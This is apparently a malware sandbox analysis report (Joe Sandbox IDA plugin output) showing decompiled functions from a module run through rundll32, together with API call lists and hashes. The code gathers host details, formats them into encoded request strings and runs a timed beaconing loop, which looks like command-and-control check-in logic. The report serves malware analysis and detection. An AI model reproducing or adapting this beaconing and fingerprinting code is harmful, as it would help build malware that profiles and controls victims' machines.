				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x444a018; // 0x3639fe1b
				asm("bswap eax");
				_t31 =  *0x444a014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x444a010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x444a00c; // 0xeec43f25
				asm("bswap eax");
				_t34 =  *0x444a320; // 0xafd5a8
				_t3 = _t34 + 0x444b633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x444a02c,  *0x444a004, _t29);
				_t37 = E04444B2C();
				_t38 =  *0x444a320; // 0xafd5a8
				_t4 = _t38 + 0x444b673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x444a320; // 0xafd5a8
					_t8 = _t92 + 0x444b67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E0444256F(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x444a320; // 0xafd5a8
					_t10 = _t87 + 0x444b8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x444a2d8, 0, _t104);
				}
				_t105 = E04444B71();
				if(_t105 != 0) {
					_t82 =  *0x444a320; // 0xafd5a8
					_t12 = _t82 + 0x444b8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x444a2d8, 0, _t105);
				}
				_t106 =  *0x444a3cc; // 0x4f495b0
				_a24 = E04447729(0x444a00a, _t106 + 4);
				_t46 =  *0x444a36c; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x444a320; // 0xafd5a8
					_t15 = _t78 + 0x444b8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x444a368; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x444a320; // 0xafd5a8
					_t17 = _t75 + 0x444b88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t108 = RtlAllocateHeap( *0x444a2d8, 0, 0x800);
					if(_t108 != 0) {
						E044453EC(GetTickCount());
						_t54 =  *0x444a3cc; // 0x4f495b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x444a3cc; // 0x4f495b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x444a3cc; // 0x4f495b0
						_t61 = E044418BA(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x444928c);
							_push(_t111);
							_t66 = E0444252A();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E04441AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E04445F6A();
								}
								HeapFree( *0x444a2d8, 0, _v16);
							}
							HeapFree( *0x444a2d8, 0, _t111);
						}
						RtlFreeHeap( *0x444a2d8, 0, _t108); // executed
					}
					HeapFree( *0x444a2d8, 0, _a16);
				}
				HeapFree( *0x444a2d8, 0, _t113);
				return _a12;
			}




















































                    0x044468eb
                    0x044468eb
                    0x044468f1
                    0x044468f7
                    0x044468ff
                    0x04446901
                    0x04446901
                    0x0444690e
                    0x04446919
                    0x0444691c
                    0x04446927
                    0x0444692a
                    0x0444692f
                    0x04446932
                    0x04446937
                    0x0444693a
                    0x04446946
                    0x04446953
                    0x04446955
                    0x0444695b
                    0x04446960
                    0x0444696b
                    0x0444696d
                    0x04446970
                    0x04446977
                    0x04446979
                    0x04446982
                    0x0444698d
                    0x0444698f
                    0x04446992
                    0x04446992
                    0x04446994
                    0x04446999
                    0x0444699d
                    0x0444699f
                    0x044469a4
                    0x044469b0
                    0x044469b2
                    0x044469be
                    0x044469c0
                    0x044469c0
                    0x044469cb
                    0x044469cf
                    0x044469d1
                    0x044469d6
                    0x044469e2
                    0x044469e4
                    0x044469f0
                    0x044469f2
                    0x044469f2
                    0x044469f8
                    0x04446a0b
                    0x04446a0f
                    0x04446a16
                    0x04446a19
                    0x04446a1e
                    0x04446a29
                    0x04446a2b
                    0x04446a2e
                    0x04446a2e
                    0x04446a30
                    0x04446a37
                    0x04446a3a
                    0x04446a3f
                    0x04446a49
                    0x04446a4b
                    0x04446a53
                    0x04446a6c
                    0x04446a70
                    0x04446a7c
                    0x04446a81
                    0x04446a8a
                    0x04446a9b
                    0x04446a9f
                    0x04446aa8
                    0x04446aae
                    0x04446ab6
                    0x04446abb
                    0x04446ac8
                    0x04446ace
                    0x04446ada
                    0x04446ae0
                    0x04446ae1
                    0x04446ae8
                    0x04446aec
                    0x04446af2
                    0x04446af9
                    0x04446b00
                    0x04446b06
                    0x04446b0d
                    0x04446b11
                    0x04446b1c
                    0x04446b23
                    0x04446b27
                    0x04446b30
                    0x04446b30
                    0x04446b41
                    0x04446b41
                    0x04446b50
                    0x04446b50
                    0x04446b5f
                    0x04446b5f
                    0x04446b71
                    0x04446b71
                    0x04446b80
                    0x04446b90

                    APIs
                    • GetTickCount.KERNEL32 ref: 04446901
                    • wsprintfA.USER32 ref: 0444694E
                    • wsprintfA.USER32 ref: 0444696B
                    • wsprintfA.USER32 ref: 0444698D
                    • wsprintfA.USER32 ref: 044469B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044469C0
                    • wsprintfA.USER32 ref: 044469E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044469F2
                    • wsprintfA.USER32 ref: 04446A29
                    • wsprintfA.USER32 ref: 04446A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04446A66
                    • GetTickCount.KERNEL32 ref: 04446A76
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04446A8A
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04446AA8
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 044418E5
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(?,?,?,04446ABB,?,04F495B0), ref: 044418ED
                      • Part of subcall function 044418BA: strcpy.NTDLL ref: 04441904
                      • Part of subcall function 044418BA: lstrcat.KERNEL32(00000000,?), ref: 0444190F
                      • Part of subcall function 044418BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04446ABB,?,04F495B0), ref: 0444192C
                    • StrTrimA.SHLWAPI(00000000,0444928C,?,04F495B0), ref: 04446ADA
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(04F49B50,00000000,00000000,7691C740,04446AE6,00000000), ref: 0444253A
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(?), ref: 04442542
                      • Part of subcall function 0444252A: lstrcpy.KERNEL32(00000000,04F49B50), ref: 04442556
                      • Part of subcall function 0444252A: lstrcat.KERNEL32(00000000,?), ref: 04442561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04446AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04446B00
                    • lstrcat.KERNEL32(00000000,?), ref: 04446B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04446B11
                      • Part of subcall function 04441AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04441B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04446B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04446B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04F495B0), ref: 04446B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04446B71
                    • HeapFree.KERNEL32(00000000,?), ref: 04446B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: af9bb003dd70fbdcad03a56a9aa8502db1d61e3e9a4c016015279d49844f0af6
                    • Instruction ID: 9fb2106a23296e76cdc7ef268feb4c0bfeb129a3fa7198f81923b0229a52eb55
                    • Opcode Fuzzy Hash: af9bb003dd70fbdcad03a56a9aa8502db1d61e3e9a4c016015279d49844f0af6
                    • Instruction Fuzzy Hash: BD71897A540200AFFB119B64EC48E5777E8FBC9314F050529F948E3251EB3DEC15AB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04442FC4 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 255memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E04442FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				void* _t93;
				void* _t98;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				intOrPtr _t136;
				int _t139;
				CHAR* _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t151;
				int _t152;
				void* _t153;
				intOrPtr _t154;
				void* _t156;
				long _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t165;
				void* _t166;
				void* _t168;

				_t151 = __edx;
				_t142 = __ecx;
				_t63 = __eax;
				_v8 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x444a018; // 0x3639fe1b
				asm("bswap eax");
				_t65 =  *0x444a014; // 0x3a87c8cd
				_t140 = _a20;
				asm("bswap eax");
				_t66 =  *0x444a010; // 0xd8d2f808
				asm("bswap eax");
				_t67 =  *0x444a00c; // 0xeec43f25
				asm("bswap eax");
				_t68 =  *0x444a320; // 0xafd5a8
				_t3 = _t68 + 0x444b633; // 0x74666f73
				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x444a02c,  *0x444a004, _t63);
				_t71 = E04444B2C();
				_t72 =  *0x444a320; // 0xafd5a8
				_t4 = _t72 + 0x444b673; // 0x74707526
				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
				_t168 = _t166 + 0x38;
				_t153 = _t152 + _t75;
				if(_a8 != 0) {
					_t136 =  *0x444a320; // 0xafd5a8
					_t8 = _t136 + 0x444b67e; // 0x732526
					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t139; // executed
				}
				_t76 = E0444256F(_t142); // executed
				_t141 = __imp__; // 0x74e05520
				_a8 = _t76;
				if(_t76 != 0) {
					_t130 =  *0x444a320; // 0xafd5a8
					_t11 = _t130 + 0x444b8d4; // 0x736e6426
					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
					_t168 = _t168 + 0xc;
					_t153 = _t153 + _t134;
					HeapFree( *0x444a2d8, 0, _a8);
				}
				_t77 = E04444B71();
				_a8 = _t77;
				if(_t77 != 0) {
					_t125 =  *0x444a320; // 0xafd5a8
					_t15 = _t125 + 0x444b8dc; // 0x6f687726
					wsprintfA(_t153 + _a20, _t15, _t77);
					_t168 = _t168 + 0xc;
					HeapFree( *0x444a2d8, 0, _a8);
				}
				_t154 =  *0x444a3cc; // 0x4f495b0
				_t79 = E04447729(0x444a00a, _t154 + 4);
				_t160 = 0;
				_v16 = _t79;
				if(_t79 == 0) {
					L28:
					RtlFreeHeap( *0x444a2d8, _t160, _a20); // executed
					return _v8;
				} else {
					_t82 = RtlAllocateHeap( *0x444a2d8, 0, 0x800); // executed
					_a8 = _t82;
					if(_t82 == 0) {
						L27:
						HeapFree( *0x444a2d8, _t160, _v16);
						goto L28;
					}
					E044453EC(GetTickCount());
					_t86 =  *0x444a3cc; // 0x4f495b0
					__imp__(_t86 + 0x40);
					asm("lock xadd [eax], ecx");
					_t90 =  *0x444a3cc; // 0x4f495b0
					__imp__(_t90 + 0x40);
					_t92 =  *0x444a3cc; // 0x4f495b0
					_t93 = E044418BA(1, _t151, _a20,  *_t92); // executed
					_t156 = _t93;
					_v24 = _t156;
					asm("lock xadd [eax], ecx");
					if(_t156 == 0) {
						L26:
						RtlFreeHeap( *0x444a2d8, _t160, _a8); // executed
						goto L27;
					}
					StrTrimA(_t156, 0x444928c);
					_push(_t156);
					_t98 = E0444252A();
					_v12 = _t98;
					if(_t98 == 0) {
						L25:
						HeapFree( *0x444a2d8, _t160, _t156);
						goto L26;
					}
					_t161 = __imp__;
					 *_t161(_t156, _a4);
					 *_t161(_a8, _v16);
					_t162 = __imp__;
					 *_t162(_a8, _v12);
					_t104 = E04445406( *_t162(_a8, _t156), _a8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v8 = 8;
						L23:
						E04445F6A();
						L24:
						HeapFree( *0x444a2d8, 0, _v12);
						_t160 = 0;
						goto L25;
					}
					_t108 = E044422C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
					_v8 = _t108;
					if(_t108 == 0) {
						_t165 = _v20;
						_t115 = E04441E51(_t165, _a4, _a12, _a16); // executed
						_v8 = _t115;
						_t116 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t165 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t165 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t165;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E044417AB(_t165);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t110 = _a12;
							if(_t110 != 0) {
								_t157 =  *_t110;
								_t163 =  *_a16;
								wcstombs( *_t110,  *_t110,  *_a16);
								_t113 = E04445D6F(_t157, _t157, _t163 >> 1);
								_t156 = _v24;
								 *_a16 = _t113;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E044417AB(_a4);
							if(_v8 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}
























































                    0x04442fc4
                    0x04442fc4
                    0x04442fc4
                    0x04442fcf
                    0x04442fd6
                    0x04442fd8
                    0x04442fd8
                    0x04442fe5
                    0x04442ff0
                    0x04442ff3
                    0x04442ff8
                    0x04443001
                    0x04443004
                    0x04443009
                    0x0444300c
                    0x04443011
                    0x04443014
                    0x04443020
                    0x0444302d
                    0x0444302f
                    0x04443035
                    0x0444303a
                    0x04443045
                    0x04443047
                    0x0444304a
                    0x04443050
                    0x04443052
                    0x0444305a
                    0x04443065
                    0x04443067
                    0x0444306a
                    0x0444306a
                    0x0444306c
                    0x04443073
                    0x04443079
                    0x0444307c
                    0x0444307f
                    0x04443084
                    0x04443091
                    0x04443093
                    0x04443099
                    0x044430a3
                    0x044430a3
                    0x044430a5
                    0x044430ac
                    0x044430af
                    0x044430b2
                    0x044430b7
                    0x044430c4
                    0x044430c6
                    0x044430d4
                    0x044430d4
                    0x044430d6
                    0x044430e4
                    0x044430e9
                    0x044430ed
                    0x044430f0
                    0x044432b1
                    0x044432bb
                    0x044432c4
                    0x044430f6
                    0x04443102
                    0x0444310a
                    0x0444310d
                    0x044432a5
                    0x044432af
                    0x00000000
                    0x044432af
                    0x04443119
                    0x0444311e
                    0x04443127
                    0x04443138
                    0x0444313c
                    0x04443145
                    0x0444314b
                    0x04443155
                    0x0444315a
                    0x04443161
                    0x0444316a
                    0x04443170
                    0x04443299
                    0x044432a3
                    0x00000000
                    0x044432a3
                    0x0444317c
                    0x04443182
                    0x04443183
                    0x0444318a
                    0x0444318d
                    0x0444328f
                    0x04443297
                    0x00000000
                    0x04443297
                    0x04443196
                    0x0444319d
                    0x044431a5
                    0x044431aa
                    0x044431b3
                    0x044431be
                    0x044431c5
                    0x044431c8
                    0x044432c7
                    0x0444327b
                    0x0444327b
                    0x04443280
                    0x0444328b
                    0x0444328d
                    0x00000000
                    0x0444328d
                    0x044431d2
                    0x044431d9
                    0x044431dc
                    0x044431e1
                    0x044431ec
                    0x044431f1
                    0x044431f4
                    0x044431fa
                    0x04443200
                    0x04443206
                    0x04443209
                    0x0444320f
                    0x04443212
                    0x04443217
                    0x0444321b
                    0x0444321b
                    0x04443227
                    0x04443233
                    0x04443237
                    0x04443239
                    0x0444323e
                    0x04443240
                    0x04443245
                    0x0444324a
                    0x04443257
                    0x0444325f
                    0x04443262
                    0x04443262
                    0x0444323e
                    0x00000000
                    0x04443229
                    0x0444322d
                    0x04443264
                    0x04443267
                    0x04443270
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04443270
                    0x0444322f
                    0x00000000
                    0x0444322f
                    0x04443227

                    APIs
                    • GetTickCount.KERNEL32 ref: 04442FD8
                    • wsprintfA.USER32 ref: 04443028
                    • wsprintfA.USER32 ref: 04443045
                    • wsprintfA.USER32 ref: 04443065
                    • wsprintfA.USER32 ref: 04443091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044430A3
                    • wsprintfA.USER32 ref: 044430C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044430D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443102
                    • GetTickCount.KERNEL32 ref: 04443113
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04443127
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04443145
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 044418E5
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(?,?,?,04446ABB,?,04F495B0), ref: 044418ED
                      • Part of subcall function 044418BA: strcpy.NTDLL ref: 04441904
                      • Part of subcall function 044418BA: lstrcat.KERNEL32(00000000,?), ref: 0444190F
                      • Part of subcall function 044418BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04446ABB,?,04F495B0), ref: 0444192C
                    • StrTrimA.SHLWAPI(00000000,0444928C,?,04F495B0), ref: 0444317C
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(04F49B50,00000000,00000000,7691C740,04446AE6,00000000), ref: 0444253A
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(?), ref: 04442542
                      • Part of subcall function 0444252A: lstrcpy.KERNEL32(00000000,04F49B50), ref: 04442556
                      • Part of subcall function 0444252A: lstrcat.KERNEL32(00000000,?), ref: 04442561
                    • lstrcpy.KERNEL32(00000000,?), ref: 0444319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 044431A5
                    • lstrcat.KERNEL32(00000000,?), ref: 044431B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 044431B9
                      • Part of subcall function 04445406: lstrlen.KERNEL32(?,00000000,04F49D58,00000000,04443C77,04F49F7B,69B25F44,?,?,?,?,69B25F44,00000005,0444A00C,4D283A53,?), ref: 0444540D
                      • Part of subcall function 04445406: mbstowcs.NTDLL ref: 04445436
                      • Part of subcall function 04445406: memset.NTDLL ref: 04445448
                    • wcstombs.NTDLL ref: 0444324A
                      • Part of subcall function 04441E51: SysAllocString.OLEAUT32(?), ref: 04441E92
                      • Part of subcall function 04441E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04441F14
                      • Part of subcall function 04441E51: StrStrIW.SHLWAPI(?,006E0069), ref: 04441F53
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0444328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04443297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04F495B0), ref: 044432A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044432AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 044432BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: 25fc54cb25d452454269ff4733467471a196aa9cf39fb89aaed4b2dacf566635
                    • Instruction ID: 36d0a0304220bf7d9ec032b5427fa54285adc06af9ecec5d05bc5cbe1c14e1fb
                    • Opcode Fuzzy Hash: 25fc54cb25d452454269ff4733467471a196aa9cf39fb89aaed4b2dacf566635
                    • Instruction Fuzzy Hash: CE914B75A00208AFEF11DFA5DC48A9ABBB9FF88754F148016F808E7251DB35ED51DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04445458 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151timememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 4445458-444548a memset CreateWaitableTimerA 103 4445490-44454e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->103 104 444560b-4445611 GetLastError 102->104 106 4445573-4445579 103->106 107 44454ef-44454f2 103->107 105 4445615-444561f 104->105 108 444557a-444557e 106->108 109 44454f4 call 4443399 107->109 110 44454fd 107->110 111 4445580-4445582 108->111 112 444558e-4445592 108->112 115 44454f9-44454fb 109->115 114 4445507 110->114 111->112 112->108 116 4445594-444559e CloseHandle 112->116 117 444550b-4445510 114->117 115->110 115->114 116->105 118 4445512-4445519 117->118 119 4445523-4445550 call 4443a12 117->119 118->119 120 444551b 118->120 123 44455a0-44455a5 119->123 124 4445552-444555d 119->124 120->119 126 44455c4-44455cc 123->126 127 44455a7-44455ad 123->127 124->117 125 444555f-444556f call 44417c0 124->125 125->106 128 44455d2-4445600 _allmul SetWaitableTimer WaitForMultipleObjects 126->128 127->106 130 44455af-44455c2 call 4445f6a 127->130 128->117 131 4445606 128->131 130->128 131->106
                    C-Code - Quality: 83%
                    			E04445458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x444a2e0);
					_v76 = 0;
					_v80 = 0;
					L0444818A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x444a30c; // 0x2e4
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x444a2ec = 5;
						} else {
							_t69 = E04443399(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x444a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04443A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_t97 = _t66 - 3;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E044417C0(_t75, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x444a2e4);
							goto L21;
						} else {
							__eflags =  *0x444a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04445F6A();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x444a2e8);
								L21:
								L0444818A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t65;
								_v128 = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x444a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                    0x04445458
                    0x0444546e
                    0x04445472
                    0x04445477
                    0x0444547e
                    0x04445486
                    0x0444548a
                    0x04445611
                    0x04445490
                    0x04445490
                    0x04445492
                    0x04445497
                    0x04445498
                    0x0444549e
                    0x044454a2
                    0x044454a6
                    0x044454b4
                    0x044454c2
                    0x044454c6
                    0x044454c8
                    0x044454d5
                    0x044454e1
                    0x044454e5
                    0x044454e9
                    0x044454f2
                    0x044454fd
                    0x044454fd
                    0x044454f4
                    0x044454f4
                    0x044454fb
                    0x00000000
                    0x00000000
                    0x044454fb
                    0x04445507
                    0x00000000
                    0x0444550b
                    0x04445510
                    0x0444551b
                    0x0444551b
                    0x04445523
                    0x04445529
                    0x04445531
                    0x0444553a
                    0x04445541
                    0x04445545
                    0x0444554c
                    0x04445550
                    0x00000000
                    0x00000000
                    0x04445552
                    0x04445556
                    0x04445559
                    0x0444555d
                    0x00000000
                    0x0444555f
                    0x0444556f
                    0x0444556f
                    0x00000000
                    0x044455a0
                    0x044455a0
                    0x044455a5
                    0x044455c4
                    0x044455c6
                    0x044455cb
                    0x044455cc
                    0x00000000
                    0x044455a7
                    0x044455a7
                    0x044455ad
                    0x00000000
                    0x044455af
                    0x044455af
                    0x044455b4
                    0x044455b6
                    0x044455bb
                    0x044455bc
                    0x044455d2
                    0x044455d2
                    0x044455da
                    0x044455e8
                    0x044455ec
                    0x044455f8
                    0x044455fa
                    0x044455fc
                    0x04445600
                    0x00000000
                    0x04445606
                    0x00000000
                    0x04445606
                    0x04445600
                    0x044455ad
                    0x00000000
                    0x044455a5
                    0x04445573
                    0x04445575
                    0x04445579
                    0x0444557a
                    0x0444557a
                    0x0444557e
                    0x04445588
                    0x04445588
                    0x0444558e
                    0x04445591
                    0x04445591
                    0x04445598
                    0x04445598
                    0x0444561f
                    0x00000000

                    APIs
                    • memset.NTDLL ref: 04445472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0444547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 044454A6
